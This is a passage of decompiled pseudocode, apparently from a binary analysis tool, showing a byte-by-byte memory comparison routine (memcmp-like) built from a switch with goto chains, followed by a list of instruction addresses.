								__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
								if(__esi == 0) {
									L377:
									__esi =  *(__eax - 0x11) & 0x000000ff;
									__edx =  *(__ecx - 0x11) & 0x000000ff;
									__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
									if(__esi == 0) {
										L379:
										__esi =  *(__eax - 0x10) & 0x000000ff;
										__edx =  *(__ecx - 0x10) & 0x000000ff;
										__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t852 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t852;
										}
										goto L382;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t846 = __edx - 1; // -1
									__esi = __edx + _t846;
									if(__edx + _t846 != 0) {
										goto L98;
									}
									goto L379;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t840 = __edx - 1; // -1
								__esi = __edx + _t840;
								if(__edx + _t840 != 0) {
									goto L98;
								}
								goto L377;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t834 = __edx - 1; // -1
							__esi = __edx + _t834;
							if(__edx + _t834 != 0) {
								goto L98;
							}
							goto L375;
						case 0x14:
							L121:
							__edx =  *(__eax - 0x14);
							if( *(__eax - 0x14) ==  *(__ecx - 0x14)) {
								__esi = 0;
								L131:
								if(__esi != 0) {
									goto L98;
								}
								goto L132;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x14) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
							if(__esi == 0) {
								L124:
								__esi =  *(__eax - 0x13) & 0x000000ff;
								__edx =  *(__ecx - 0x13) & 0x000000ff;
								__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
								if(__esi == 0) {
									L126:
									__esi =  *(__eax - 0x12) & 0x000000ff;
									__edx =  *(__ecx - 0x12) & 0x000000ff;
									__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
									if(__esi == 0) {
										L128:
										__esi =  *(__eax - 0x11) & 0x000000ff;
										__edx =  *(__ecx - 0x11) & 0x000000ff;
										__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t284 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t284;
										}
										goto L131;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t278 = __edx - 1; // -1
									__esi = __edx + _t278;
									if(__edx + _t278 != 0) {
										goto L98;
									}
									goto L128;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t272 = __edx - 1; // -1
								__esi = __edx + _t272;
								if(__edx + _t272 != 0) {
									goto L98;
								}
								goto L126;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t266 = __edx - 1; // -1
							__esi = __edx + _t266;
							if(__edx + _t266 != 0) {
								goto L98;
							}
							goto L124;
						case 0x15:
							L201:
							__edx =  *(__eax - 0x15);
							if( *(__eax - 0x15) ==  *(__ecx - 0x15)) {
								__esi = 0;
								L211:
								if(__esi != 0) {
									goto L98;
								}
								goto L212;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x15) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
							if(__esi == 0) {
								L204:
								__esi =  *(__eax - 0x14) & 0x000000ff;
								__edx =  *(__ecx - 0x14) & 0x000000ff;
								__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
								if(__esi == 0) {
									L206:
									__esi =  *(__eax - 0x13) & 0x000000ff;
									__edx =  *(__ecx - 0x13) & 0x000000ff;
									__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
									if(__esi == 0) {
										L208:
										__esi =  *(__eax - 0x12) & 0x000000ff;
										__edx =  *(__ecx - 0x12) & 0x000000ff;
										__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t460 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t460;
										}
										goto L211;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t454 = __edx - 1; // -1
									__esi = __edx + _t454;
									if(__edx + _t454 != 0) {
										goto L98;
									}
									goto L208;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t448 = __edx - 1; // -1
								__esi = __edx + _t448;
								if(__edx + _t448 != 0) {
									goto L98;
								}
								goto L206;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t442 = __edx - 1; // -1
							__esi = __edx + _t442;
							if(__edx + _t442 != 0) {
								goto L98;
							}
							goto L204;
						case 0x16:
							L280:
							__edx =  *(__eax - 0x16);
							if( *(__eax - 0x16) ==  *(__ecx - 0x16)) {
								__esi = 0;
								L290:
								if(__esi != 0) {
									goto L98;
								}
								goto L291;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x16) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
							if(__esi == 0) {
								L283:
								__esi =  *(__eax - 0x15) & 0x000000ff;
								__edx =  *(__ecx - 0x15) & 0x000000ff;
								__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
								if(__esi == 0) {
									L285:
									__esi =  *(__eax - 0x14) & 0x000000ff;
									__edx =  *(__ecx - 0x14) & 0x000000ff;
									__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
									if(__esi == 0) {
										L287:
										__esi =  *(__eax - 0x13) & 0x000000ff;
										__edx =  *(__ecx - 0x13) & 0x000000ff;
										__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t642 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t642;
										}
										goto L290;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t636 = __edx - 1; // -1
									__esi = __edx + _t636;
									if(__edx + _t636 != 0) {
										goto L98;
									}
									goto L287;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t630 = __edx - 1; // -1
								__esi = __edx + _t630;
								if(__edx + _t630 != 0) {
									goto L98;
								}
								goto L285;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t624 = __edx - 1; // -1
							__esi = __edx + _t624;
							if(__edx + _t624 != 0) {
								goto L98;
							}
							goto L283;
						case 0x17:
							L361:
							__edx =  *(__eax - 0x17);
							if( *(__eax - 0x17) ==  *(__ecx - 0x17)) {
								__esi = 0;
								L371:
								if(__esi != 0) {
									goto L98;
								}
								goto L372;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x17) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
							if(__esi == 0) {
								L364:
								__esi =  *(__eax - 0x16) & 0x000000ff;
								__edx =  *(__ecx - 0x16) & 0x000000ff;
								__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
								if(__esi == 0) {
									L366:
									__esi =  *(__eax - 0x15) & 0x000000ff;
									__edx =  *(__ecx - 0x15) & 0x000000ff;
									__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
									if(__esi == 0) {
										L368:
										__esi =  *(__eax - 0x14) & 0x000000ff;
										__edx =  *(__ecx - 0x14) & 0x000000ff;
										__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t827 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t827;
										}
										goto L371;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t821 = __edx - 1; // -1
									__esi = __edx + _t821;
									if(__edx + _t821 != 0) {
										goto L98;
									}
									goto L368;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t815 = __edx - 1; // -1
								__esi = __edx + _t815;
								if(__edx + _t815 != 0) {
									goto L98;
								}
								goto L366;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t809 = __edx - 1; // -1
							__esi = __edx + _t809;
							if(__edx + _t809 != 0) {
								goto L98;
							}
							goto L364;
						case 0x18:
							L110:
							__edx =  *(__eax - 0x18);
							if( *(__eax - 0x18) ==  *(__ecx - 0x18)) {
								__esi = 0;
								L120:
								if(__esi != 0) {
									goto L98;
								}
								goto L121;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x18) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
							if(__esi == 0) {
								L113:
								__esi =  *(__eax - 0x17) & 0x000000ff;
								__edx =  *(__ecx - 0x17) & 0x000000ff;
								__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
								if(__esi == 0) {
									L115:
									__esi =  *(__eax - 0x16) & 0x000000ff;
									__edx =  *(__ecx - 0x16) & 0x000000ff;
									__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
									if(__esi == 0) {
										L117:
										__esi =  *(__eax - 0x15) & 0x000000ff;
										__edx =  *(__ecx - 0x15) & 0x000000ff;
										__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t259 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t259;
										}
										goto L120;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t253 = __edx - 1; // -1
									__esi = __edx + _t253;
									if(__edx + _t253 != 0) {
										goto L98;
									}
									goto L117;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t247 = __edx - 1; // -1
								__esi = __edx + _t247;
								if(__edx + _t247 != 0) {
									goto L98;
								}
								goto L115;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t241 = __edx - 1; // -1
							__esi = __edx + _t241;
							if(__edx + _t241 != 0) {
								goto L98;
							}
							goto L113;
						case 0x19:
							L190:
							__edx =  *(__eax - 0x19);
							if( *(__eax - 0x19) ==  *(__ecx - 0x19)) {
								__esi = 0;
								L200:
								if(__esi != 0) {
									goto L98;
								}
								goto L201;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x19) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
							if(__esi == 0) {
								L193:
								__esi =  *(__eax - 0x18) & 0x000000ff;
								__edx =  *(__ecx - 0x18) & 0x000000ff;
								__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
								if(__esi == 0) {
									L195:
									__esi =  *(__eax - 0x17) & 0x000000ff;
									__edx =  *(__ecx - 0x17) & 0x000000ff;
									__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
									if(__esi == 0) {
										L197:
										__esi =  *(__eax - 0x16) & 0x000000ff;
										__edx =  *(__ecx - 0x16) & 0x000000ff;
										__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t435 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t435;
										}
										goto L200;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t429 = __edx - 1; // -1
									__esi = __edx + _t429;
									if(__edx + _t429 != 0) {
										goto L98;
									}
									goto L197;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t423 = __edx - 1; // -1
								__esi = __edx + _t423;
								if(__edx + _t423 != 0) {
									goto L98;
								}
								goto L195;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t417 = __edx - 1; // -1
							__esi = __edx + _t417;
							if(__edx + _t417 != 0) {
								goto L98;
							}
							goto L193;
						case 0x1a:
							L269:
							__edx =  *(__eax - 0x1a);
							if( *(__eax - 0x1a) ==  *(__ecx - 0x1a)) {
								__esi = 0;
								L279:
								if(__esi != 0) {
									goto L98;
								}
								goto L280;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L272:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi == 0) {
									L274:
									__esi =  *(__eax - 0x18) & 0x000000ff;
									__edx =  *(__ecx - 0x18) & 0x000000ff;
									__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
									if(__esi == 0) {
										L276:
										__esi =  *(__eax - 0x17) & 0x000000ff;
										__edx =  *(__ecx - 0x17) & 0x000000ff;
										__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t617 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t617;
										}
										goto L279;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t611 = __edx - 1; // -1
									__esi = __edx + _t611;
									if(__edx + _t611 != 0) {
										goto L98;
									}
									goto L276;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t605 = __edx - 1; // -1
								__esi = __edx + _t605;
								if(__edx + _t605 != 0) {
									goto L98;
								}
								goto L274;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t599 = __edx - 1; // -1
							__esi = __edx + _t599;
							if(__edx + _t599 != 0) {
								goto L98;
							}
							goto L272;
						case 0x1b:
							L350:
							__edx =  *(__eax - 0x1b);
							if( *(__eax - 0x1b) ==  *(__ecx - 0x1b)) {
								__esi = 0;
								L360:
								if(__esi != 0) {
									goto L98;
								}
								goto L361;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L353:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi == 0) {
									L355:
									__esi =  *(__eax - 0x19) & 0x000000ff;
									__edx =  *(__ecx - 0x19) & 0x000000ff;
									__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
									if(__esi == 0) {
										L357:
										__esi =  *(__eax - 0x18) & 0x000000ff;
										__edx =  *(__ecx - 0x18) & 0x000000ff;
										__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t802 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t802;
										}
										goto L360;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t796 = __edx - 1; // -1
									__esi = __edx + _t796;
									if(__edx + _t796 != 0) {
										goto L98;
									}
									goto L357;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t790 = __edx - 1; // -1
								__esi = __edx + _t790;
								if(__edx + _t790 != 0) {
									goto L98;
								}
								goto L355;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t784 = __edx - 1; // -1
							__esi = __edx + _t784;
							if(__edx + _t784 != 0) {
								goto L98;
							}
							goto L353;
						case 0x1c:
							__edx =  *(__eax - 0x1c);
							if( *(__eax - 0x1c) ==  *(__ecx - 0x1c)) {
								__esi = 0;
								L109:
								if(__esi != 0) {
									goto L98;
								}
								goto L110;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L102:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi == 0) {
									L104:
									__esi =  *(__eax - 0x1a) & 0x000000ff;
									__edx =  *(__ecx - 0x1a) & 0x000000ff;
									__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
									if(__esi == 0) {
										L106:
										__esi =  *(__eax - 0x19) & 0x000000ff;
										__edx =  *(__ecx - 0x19) & 0x000000ff;
										__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t234 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t234;
										}
										goto L109;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t228 = __edx - 1; // -1
									__esi = __edx + _t228;
									if(__edx + _t228 != 0) {
										goto L98;
									}
									goto L106;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t222 = __edx - 1; // -1
								__esi = __edx + _t222;
								if(__edx + _t222 != 0) {
									goto L98;
								}
								goto L104;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t216 = __edx - 1; // -1
							__esi = __edx + _t216;
							if(__edx + _t216 != 0) {
								goto L98;
							}
							goto L102;
						case 0x1d:
							__edx =  *(__eax - 0x1d);
							if( *(__eax - 0x1d) ==  *(__ecx - 0x1d)) {
								__esi = 0;
								L189:
								if(__esi != 0) {
									goto L98;
								}
								goto L190;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L182:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi == 0) {
									L184:
									__esi =  *(__eax - 0x1b) & 0x000000ff;
									__edx =  *(__ecx - 0x1b) & 0x000000ff;
									__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
									if(__esi == 0) {
										L186:
										__esi =  *(__eax - 0x1a) & 0x000000ff;
										__edx =  *(__ecx - 0x1a) & 0x000000ff;
										__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t410 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t410;
										}
										goto L189;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t404 = __edx - 1; // -1
									__esi = __edx + _t404;
									if(__edx + _t404 != 0) {
										goto L98;
									}
									goto L186;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t398 = __edx - 1; // -1
								__esi = __edx + _t398;
								if(__edx + _t398 != 0) {
									goto L98;
								}
								goto L184;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t392 = __edx - 1; // -1
							__esi = __edx + _t392;
							if(__edx + _t392 != 0) {
								goto L98;
							}
							goto L182;
						case 0x1e:
							__edx =  *(__eax - 0x1e);
							if( *(__eax - 0x1e) ==  *(__ecx - 0x1e)) {
								__esi = 0;
								L268:
								if(__esi != 0) {
									goto L98;
								}
								goto L269;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x1e) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
							if(__esi == 0) {
								L261:
								__esi =  *(__eax - 0x1d) & 0x000000ff;
								__edx =  *(__ecx - 0x1d) & 0x000000ff;
								__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
								if(__esi == 0) {
									L263:
									__esi =  *(__eax - 0x1c) & 0x000000ff;
									__edx =  *(__ecx - 0x1c) & 0x000000ff;
									__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
									if(__esi == 0) {
										L265:
										__esi =  *(__eax - 0x1b) & 0x000000ff;
										__edx =  *(__ecx - 0x1b) & 0x000000ff;
										__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t592 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t592;
										}
										goto L268;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t586 = __edx - 1; // -1
									__esi = __edx + _t586;
									if(__edx + _t586 != 0) {
										goto L98;
									}
									goto L265;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t580 = __edx - 1; // -1
								__esi = __edx + _t580;
								if(__edx + _t580 != 0) {
									goto L98;
								}
								goto L263;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t574 = __edx - 1; // -1
							__esi = __edx + _t574;
							if(__edx + _t574 != 0) {
								goto L98;
							}
							goto L261;
						case 0x1f:
							__edx =  *(__eax - 0x1f);
							if( *(__eax - 0x1f) ==  *(__ecx - 0x1f)) {
								__esi = 0;
								L349:
								if(__esi != 0) {
									goto L98;
								}
								goto L350;
							}
							__edx =  *(__ecx - 0x1f) & 0x000000ff;
							__esi =  *(__eax - 0x1f) & 0x000000ff;
							__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
							if(__esi == 0) {
								L342:
								__esi =  *(__eax - 0x1e) & 0x000000ff;
								__edx =  *(__ecx - 0x1e) & 0x000000ff;
								__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
								if(__esi == 0) {
									L344:
									__esi =  *(__eax - 0x1d) & 0x000000ff;
									__edx =  *(__ecx - 0x1d) & 0x000000ff;
									__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
									if(__esi == 0) {
										L346:
										__esi =  *(__eax - 0x1c) & 0x000000ff;
										__edx =  *(__ecx - 0x1c) & 0x000000ff;
										__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t777 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t777;
										}
										goto L349;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t771 = __edx - 1; // -1
									__esi = __edx + _t771;
									if(__edx + _t771 != 0) {
										goto L98;
									}
									goto L346;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t765 = __edx - 1; // -1
								__esi = __edx + _t765;
								if(__edx + _t765 != 0) {
									goto L98;
								}
								goto L344;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t759 = __edx - 1; // -1
							__esi = __edx + _t759;
							if(__edx + _t759 != 0) {
								goto L98;
							}
							goto L342;
					}
				}
			}

0x003c0047
0x003c004c
0x003c004f
0x00000000
0x003c150c
0x003c0055
0x003c0056
0x003c14fe
0x003c1501
0x003c1504
0x003c1473
0x003c1473
0x003c1475
0x003c1511
0x003c1511
0x003c1511
0x003c1482
0x00000000
0x003c1482
0x003c005c
0x003c005d
0x003c14cf
0x003c14d2
0x003c14d2
0x003c14db
0x003c14dd
0x003c14ee
0x003c14ee
0x003c14f2
0x00000000
0x003c14f2
0x003c14e6
0x003c14e6
0x003c14ec
0x00000000
0x00000000
0x00000000
0x003c14ec
0x003c0063
0x003c0064
0x003c148b
0x003c148e
0x003c148e
0x003c1497
0x003c1499
0x003c14aa
0x003c14b2
0x003c14b4
0x003c14c5
0x003c14c5
0x003c14c9
0x00000000
0x003c14c9
0x003c14bd
0x003c14bd
0x003c14c3
0x00000000
0x00000000
0x00000000
0x003c14c3
0x003c14a2
0x003c14a2
0x003c14a8
0x00000000
0x00000000
0x00000000
0x003c14a8
0x003c006b
0x003c140a
0x003c140d
0x003c140d
0x003c1416
0x003c1418
0x003c142d
0x003c1435
0x003c1437
0x003c144c
0x003c1454
0x003c1456
0x003c146b
0x003c146b
0x003c146f
0x00000000
0x003c146f
0x003c145f
0x003c145f
0x003c1465
0x00000000
0x00000000
0x00000000
0x003c1465
0x003c1440
0x003c1440
0x003c1446
0x00000000
0x00000000
0x00000000
0x003c1446
0x003c1421
0x003c1421
0x003c1427
0x00000000
0x00000000
0x00000000
0x003c0071
0x003c0071
0x003c0071
0x003c0074
0x003c007a
0x003c04b2
0x003c0084
0x003c00fa
0x003c00fc
0x003c00fe
0x003c04ce
0x003c04ce
0x003c086d
0x00000000
0x003c086d
0x003c010a
0x003c0182
0x003c0184
0x003c0186
0x00000000
0x00000000
0x003c0192
0x003c020a
0x003c020c
0x003c020e
0x00000000
0x00000000
0x003c021a
0x003c0292
0x003c0294
0x003c0296
0x00000000
0x00000000
0x003c02a2
0x003c031a
0x003c031c
0x003c031e
0x00000000
0x00000000
0x003c032a
0x003c03a2
0x003c03a4
0x003c03a6
0x00000000
0x00000000
0x003c03b2
0x003c042a
0x003c042c
0x003c042e
0x00000000
0x00000000
0x003c043a
0x003c04a6
0x003c04a8
0x003c04aa
0x00000000
0x003c04ac
0x003c04ac
0x003c04ae
0x003c04b0
0x00000000
0x003c04b0
0x003c04aa
0x003c0444
0x003c0446
0x003c0457
0x003c045f
0x003c0461
0x003c0472
0x003c047a
0x003c047c
0x003c048d
0x003c0495
0x003c0497
0x003c04a0
0x003c04a0
0x003c04a0
0x00000000
0x003c0497
0x003c0485
0x003c0485
0x003c048b
0x00000000
0x00000000
0x00000000
0x003c048b
0x003c046a
0x003c046a
0x003c0470
0x00000000
0x00000000
0x00000000
0x003c0470
0x003c044f
0x003c044f
0x003c0455
0x00000000
0x00000000
0x00000000
0x003c0455
0x003c03bc
0x003c03be
0x003c03d3
0x003c03db
0x003c03dd
0x003c03f2
0x003c03fa
0x003c03fc
0x003c0411
0x003c0419
0x003c041b
0x003c0424
0x003c0424
0x003c0424
0x00000000
0x003c041b
0x003c0405
0x003c0405
0x003c040b
0x00000000
0x00000000
0x00000000
0x003c040b
0x003c03e6
0x003c03e6
0x003c03ec
0x00000000
0x00000000
0x00000000
0x003c03ec
0x003c03c7
0x003c03c7
0x003c03cd
0x00000000
0x00000000
0x00000000
0x003c03cd
0x003c0334
0x003c0336
0x003c034b
0x003c0353
0x003c0355
0x003c036a
0x003c0372
0x003c0374
0x003c0389
0x003c0391
0x003c0393
0x003c039c
0x003c039c
0x003c039c
0x00000000
0x003c0393
0x003c037d
0x003c037d
0x003c0383
0x00000000
0x00000000
0x00000000
0x003c0383
0x003c035e
0x003c035e
0x003c0364
0x00000000
0x00000000
0x00000000
0x003c0364
0x003c033f
0x003c033f
0x003c0345
0x00000000
0x00000000
0x00000000
0x003c0345
0x003c02ac
0x003c02ae
0x003c02c3
0x003c02cb
0x003c02cd
0x003c02e2
0x003c02ea
0x003c02ec
0x003c0301
0x003c0309
0x003c030b
0x003c0314
0x003c0314
0x003c0314
0x00000000
0x003c030b
0x003c02f5
0x003c02f5
0x003c02fb
0x00000000
0x00000000
0x00000000
0x003c02fb
0x003c02d6
0x003c02d6
0x003c02dc
0x00000000
0x00000000
0x00000000
0x003c02dc
0x003c02b7
0x003c02b7
0x003c02bd
0x00000000
0x00000000
0x00000000
0x003c02bd
0x003c0224
0x003c0226
0x003c023b
0x003c0243
0x003c0245
0x003c025a
0x003c0262
0x003c0264
0x003c0279
0x003c0281
0x003c0283
0x003c028c
0x003c028c
0x003c028c
0x00000000
0x003c0283
0x003c026d
0x003c026d
0x003c0273
0x00000000
0x00000000
0x00000000
0x003c0273
0x003c024e
0x003c024e
0x003c0254
0x00000000
0x00000000
0x00000000
0x003c0254
0x003c022f
0x003c022f
0x003c0235
0x00000000
0x00000000
0x00000000
0x003c0235
0x003c019c
0x003c019e
0x003c01b3
0x003c01bb
0x003c01bd
0x003c01d2
0x003c01da
0x003c01dc
0x003c01f1
0x003c01f9
0x003c01fb
0x003c0204
0x003c0204
0x003c0204
0x00000000
0x003c01fb
0x003c01e5
0x003c01e5
0x003c01eb
0x00000000
0x00000000
0x00000000
0x003c01eb
0x003c01c6
0x003c01c6
0x003c01cc
0x00000000
0x00000000
0x00000000
0x003c01cc
0x003c01a7
0x003c01a7
0x003c01ad
0x00000000
0x00000000
0x00000000
0x003c01ad
0x003c0114
0x003c0116
0x003c012b
0x003c0133
0x003c0135
0x003c014a
0x003c0152
0x003c0154
0x003c0169
0x003c0171
0x003c0173
0x003c017c
0x003c017c
0x003c017c
0x00000000
0x003c0173
0x003c015d
0x003c015d
0x003c0163
0x00000000
0x00000000
0x00000000
0x003c0163
0x003c013e
0x003c013e
0x003c0144
0x00000000
